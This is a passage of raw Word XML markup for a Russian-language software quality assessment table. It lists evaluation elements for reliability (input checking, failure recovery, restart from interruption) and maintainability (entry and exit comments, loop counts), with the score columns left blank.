              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие средств контроля корректности входных данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие требований к программе по восстановлению процесса выполнения в случае сбоя ОС, внешних устройств, процессора</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие средств восстановления при сбоях оборудования</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00732FB8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие возможности повторного старта с точки прерывания</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00CA04A0" w:rsidP="00CA04A0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие возможности обработки неопределенностей</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00CA04A0" w:rsidP="00D22104">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие централизованного</w:t>
            </w:r>
            <w:r w:rsidR="00D22104" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>управления процессами,</w:t>
            </w:r>
            <w:r w:rsidR="00D22104" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>конкурирующими из-за ресурсов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00732FB8" w:rsidRPr="00617AC0" w:rsidRDefault="00732FB8" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00D22104">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие возможности автоматически обходить ошибочные ситуации в процессе вычисления</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00D22104">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Всего</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="00990861">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9656" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00D22104">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценочные элементы фактора «Сопровождаемость»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наличие комментариев в точках входа и выхода в программу</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="005324F4">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Осуществляется ли передача результатов работы модуля через вызывающий его модуль</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1401" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidTr="0012083F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="989" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4268" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="005324F4" w:rsidP="00D22104">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оценка программы по числу циклов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1329" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D22104" w:rsidRPr="00617AC0" w:rsidRDefault="00D22104" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
